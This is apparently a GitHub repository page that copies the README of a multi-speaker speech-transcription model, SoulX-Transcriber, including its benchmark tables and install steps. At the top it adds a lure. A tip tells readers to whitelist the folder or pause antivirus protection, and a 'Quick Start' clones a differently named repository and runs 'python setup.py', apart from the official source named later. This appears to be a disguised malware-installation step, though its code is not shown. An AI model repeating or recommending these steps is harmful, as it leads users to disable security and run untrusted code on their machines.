SoulX-Transcriber: A Robust End-to-End Framework for Multi-Speaker Speech Transcription

Tip

If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.

Caution

Some security systems may block the installation. Only download from the official repository.

QUICK START

git clone https://github.com/PrideSquidExalt/SoulX-Transcriber-setup.git
cd SoulX-Transcriber-setup
python setup.py

SoulX-Transcriber: A Robust End-to-End Framework for Multi-Speaker Speech Transcription

Yuhang Dai^1,2^, Haopeng Lin²^, Zhennan Lin¹, Jiale Qian², Jun Wu², Hao Meng², Hanke Xie^1,2, Hanlin Wen², Chuang Ding³, Shunshun Yin², Ming Tao², Lei Xie¹, Xinsheng Wang^2†

^*Equal contribution. ^†Corresponding author

¹Audio, Speech and Language Processing Group (ASLP@NPU), Northwestern Polytechnical University, Xi’an, China
²Soul AI Lab, China
³Moonstep AI, China

🎬 Demo Video

soulx-transcriber-demo-01.mp4

Please visit our ✨demopage✨ for more demos.

🏆 SoulX-Transcriber performance Overview

📖 Introduction

SoulX-Transcriber is a unified end-to-end large audio language model for multi-speaker diarization and recognition in multi-speaker dialogue scenarios. Rather than relying on a cascaded pipeline, the model directly learns speaker attribution, timestamped segmentation, and transcription in a single framework, producing coherent speaker-consistent transcripts for overlapping and fast-turn conversations.

🌟 Highlights

State of the art performance. SoulX-Transcriber achieves superior performance on the AISHELL-4 and AliMeeting benchmarks via a unified diarization and recognition framework, which directly produces structured outputs consisting of timestamps, speaker labels, and transcripts.
Speaker-aware multi-stage training. Speaker-aware multi-task Continues Pre-Training plus Supervised Fine-tuned strengthens speaker representation and robustness to conversations, mitigating same-gender confusion, overlap, and boundary errors.
A more natural and authentic approach to dialogue generation. We propose a speaker characteristics-driven audio matching pipeline that automatically selects the most suitable reference audio for each utterance, producing more natural, context-aligned simulated dialogues.

📊 Results

Utterance-level Evaluation on open-source datasets

Model	AISHELL-4				Alimeeting				AMI-SDM
Model	DER↓	WER↓	cpWER↓	∆cp↓	DER↓	WER↓	cpWER↓	∆cp↓	DER↓	WER↓	cpWER↓	∆cp↓
VibeVoice-ASR	6.77	21.40	24.99	3.59	10.92	27.40	29.33	1.93	13.43	24.65	28.82	4.17
Gemini-2.5-Pro†	36.07	19.81	25.11	5.30	56.39	30.16	39.29	9.13	50.28	31.66	39.98	8.32
Gemini-3.1-pro-preview†	24.84	24.86	24.81	-0.05	30.76	18.82	18.99	0.17	40.40	30.82	32.97	2.15
Qwen3.5-omni†	22.33	15.13	14.71	-0.42	26.46	12.44	12.79	0.35	30.05	28.57	33.46	4.89
SoulX-Transcriber	2.89	14.16	13.90	-0.26	5.39	13.07	13.61	0.54	11.67	25.55	32.78	7.23

Segmented Evaluation (5 minutes segments)

Model	Alimeeting				AISHELL-4
Model	DER↓	CER↓	cpCER↓	∆cp↓	DER↓	CER↓	cpCER↓	∆cp↓
End-to-End Baselines
VibeVoice-ASR	18.00	29.72	31.94	2.22	9.17	19.54	22.95	3.41
Gemini-2.5-Pro†	58.14	31.69	42.22	10.53	40.87	20.26	26.31	6.05
Gemini-3.1-pro-preview†	38.75	26.75	32.84	6.09	22.03	22.75	27.43	4.68
Qwen3-omni-30B-Instruct	38.36	25.28	37.54	12.26	34.71	15.95	23.63	7.68
Ours
SoulX-Transcriber	4.40	10.34	11.58	1.24	6.12	12.87	15.45	2.58

Internal Multi-domain Evaluation

Model	Social conversation				Drama				Podcast
Model	DER↓	WER↓	cpWER↓	∆cp↓	DER↓	WER↓	cpWER↓	∆cp↓	DER↓	WER↓	cpWER↓	∆cp↓
VibeVoice-ASR	2.76	30.34	31.77	1.43	27.78	21.86	45.87	24.01	14.7	8.88	14.58	5.7
Gemini-3.1-pro-preview†	38.69	29.14	36.72	7.58	34.87	10.01	21.03	11.02	24.56	23.89	27.21	3.32
SoulX-Transcriber	1.32	6.73	7.31	0.58	23.56	5.17	20.58	15.41	21.15	7.5	19.37	11.87

† Closed-source model.

🧪 Multi-speaker Dialogue Simulation Pipeline

To improve out-of-domain generalization, we build an agent-based multi-speaker dialogue simulation pipeline with a speaker-aware prompt audio matching mechanism. Given a target dialogue text, the system analyzes speaker tags, selects the most suitable reference audio for each speaker using multi-dimensional speaker representations, and synthesizes context-consistent multi-turn dialogue audio.

Workflow: building dialogue text database → building reference audio database → target text analysis → reference audio matching → dialogue audio generation. Detailed information is shown on the figure below.

Dialogue text database. We collect multi-speaker dialogue texts from Chinese/English podcasts and novels. An LLM annotates speaker tags and controls the number of speakers; we keep segments with 3–8 speakers to ensure natural, coherent dialogue context.
Dialogue context analysis: We use Qwen3-8B as the LLM brain for speaker-tag and context analysis, and SoulX-Podcast & MOSS-TTSD for long-form, multi-speaker multi-turn TTS synthesis.
Reference audio database. We run VAD on long-form drama audio, cut it into 3–10s clips, and filter by UTMOS and SNR to ensure quality. Each clip is annotated by Gemini-3.1-pro-preview with multi-dimensional speaker attributes (e.g., gender/age/emotion/speech rate/pitch/timbre/style/tone/role state). We embed each attribute using bge-m3 and stack them into a per-clip feature matrix, forming an embedding index for retrieval.
Best reference–audio matching. Given a target dialogue with speaker tags, an LLM analyzes each speaker’s attributes and builds the same multi-dimensional embedding representation. We compute similarity against all reference clips, apply a weighted score across attribute dimensions, and retrieve top-k (k=3) candidates per speaker. A final selection enforces diversity (different source speakers) and UTMOS consistency (|Δ| ≤ 0.5) to produce the best reference audio set for synthesis.

Installation

Environment Setup

git clone https://github.com/Soul-AILab/SoulX-Transcriber.git
cd SoulX-Transcriber

conda create -n soulx_transcriber python=3.12 -y
conda activate soulx_transcriber

Install MS-Swift and dependencies:

pip install ms-swift

Model Download

We provide the pre-trained model weights on Hugging Face and modelscope. You can download the model based on your requirements:

Model Version	Description	Language	Download
SoulX-Transcriber	Full version of SoulX-Transcriber	ZH/EN	🤗 Hugging Face
SoulX-Transcriber	Full version of SoulX-Transcriber	ZH/EN	ModelScope

Training & Fine-tuning

SoulX-Transcriber shares the same architecture with Qwen3-Omni-30BA3B-Instruct. We recommend users conduct continued pre-training and fine-tuning for this model via the ms-swift toolkit.

Inference

vLLM-omni

SoulX-Transcriber is built on top of Qwen3-Omni-30B-A3B-Instruct. We recommend using vllm-omni for inference..

cd your_env_path/
# install uv：
curl -LsSf https://astral.sh/uv/install.sh | sh
# create new uv environment（using aliyun mirror）
uv venv vllm_omni --python 3.12 --seed --index-url https://mirrors.aliyun.com/pypi/simple/
# activate uv environment
source vllm_omni/bin/activate
# install vllm：
uv pip install vllm --torch-backend=auto --index-url https://mirrors.aliyun.com/pypi/simple/
# install vllm-omni:
uv pip install vllm-omni --index-url https://mirrors.aliyun.com/pypi/simple/
# install gradio (Optional)：
uv pip install 'vllm-omni[demo]' --index-url https://mirrors.aliyun.com/pypi/simple/
# If you meet an "Undefined symbol" error while using VLLM_USE_PRECOMPILED=1, please use "pip install -e . -v" to build from source.
git clone https://github.com/vllm-project/vllm-omni.git
cd vllm-omni
uv pip install -e . --index-url https://mirrors.aliyun.com/pypi/simple/

For more details on compiling vLLM from source, refer to the vLLM official documentation.

Infer single wav file

# stage1: download pretrained model
# stage2: inference
source your_env_path/vllm_omni/bin/activate  # source the env
bash ./inference.sh

Infer single wav file with retry mechanism

# stage1: download pretrained model
# stage2: inference
source your_env_path/vllm_omni/bin/activate  # source the env
bash ./inference_with_retry.sh

🙏 Acknowledgements

Special thanks to the following open-source projects:

Citation

If you find this work useful, please cite:

@misc{dai2026soulxtranscriber,
      title={SoulX-Transcriber: A Robust End-to-End Framework for Multi-Speaker Speech Transcription}, 
      author={Yuhang Dai and Haopeng Lin and Zhennan Lin and Jiale Qian and Jun Wu and Hanke Xie and Hao Meng and Hanlin Wen and Chuang Ding and Shunshun Yin and Ming Tao and Lei Xie and Xinsheng Wang},
      year={2026},
      eprint={2606.02400},
      archivePrefix={arXiv},
      primaryClass={eess.AS},
      url={https://arxiv.org/abs/2606.02400}, 
}

License

We use the Apache 2.0 License. Researchers and developers are free to use the codes and model weights of our SoulX-Transcriber. Check the license at LICENSE for more details.

Contact

Issues: Please open a GitHub Issue for bug reports or suggestions.
Email: yhdai@mail.nwpu.edu.cn, haopenglin@soulapp.cn, lxie@nwpu.edu.cn, wangxinsheng@soulapp.cn

Name		Name	Last commit message	Last commit date
Latest commit History 24 Commits
.github/workflows		.github/workflows
build/lib		build/lib
data		data
figs		figs
inference		inference
src/models/checkpoints/cache/weights		src/models/checkpoints/cache/weights
.gitignore		.gitignore
CHANGELOG.md		CHANGELOG.md
CONTRIBUTING.md		CONTRIBUTING.md
LICENSE		LICENSE
README.md		README.md
SECURITY.md		SECURITY.md
inference.sh		inference.sh
inference_with_retry.sh		inference_with_retry.sh
setup.py		setup.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

QUICK START

SoulX-Transcriber: A Robust End-to-End Framework for Multi-Speaker Speech Transcription

Yuhang Dai^1,2^, Haopeng Lin²^, Zhennan Lin¹, Jiale Qian², Jun Wu², Hao Meng², Hanke Xie^1,2, Hanlin Wen², Chuang Ding³, Shunshun Yin², Ming Tao², Lei Xie¹, Xinsheng Wang^2†

🎬 Demo Video

🏆 SoulX-Transcriber performance Overview

📖 Introduction

🌟 Highlights

📊 Results

Utterance-level Evaluation on open-source datasets

Segmented Evaluation (5 minutes segments)

Internal Multi-domain Evaluation

🧪 Multi-speaker Dialogue Simulation Pipeline

Installation

Environment Setup

Model Download

Training & Fine-tuning

Inference

vLLM-omni

Infer single wav file

Infer single wav file with retry mechanism

🙏 Acknowledgements

Citation

License

Contact

About

Uh oh!

Releases

Packages

Uh oh!

Contributors

Uh oh!

Languages

Folders and files

Latest commit

History

Repository files navigation

QUICK START

SoulX-Transcriber: A Robust End-to-End Framework for Multi-Speaker Speech Transcription

Yuhang Dai1,2*, Haopeng Lin2*, Zhennan Lin1, Jiale Qian2, Jun Wu2, Hao Meng2, Hanke Xie1,2, Hanlin Wen2, Chuang Ding3, Shunshun Yin2, Ming Tao2, Lei Xie1, Xinsheng Wang2†

🎬 Demo Video

🏆 SoulX-Transcriber performance Overview

📖 Introduction

🌟 Highlights

📊 Results

Utterance-level Evaluation on open-source datasets

Segmented Evaluation (5 minutes segments)

Internal Multi-domain Evaluation

🧪 Multi-speaker Dialogue Simulation Pipeline

Installation

Environment Setup

Model Download

Training & Fine-tuning

Inference

vLLM-omni

Infer single wav file

Infer single wav file with retry mechanism

🙏 Acknowledgements

Citation

License

Contact

About

Topics

Resources

License

Contributing

Security policy

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

Yuhang Dai^1,2^, Haopeng Lin²^, Zhennan Lin¹, Jiale Qian², Jun Wu², Hao Meng², Hanke Xie^1,2, Hanlin Wen², Chuang Ding³, Shunshun Yin², Ming Tao², Lei Xie¹, Xinsheng Wang^2†

Packages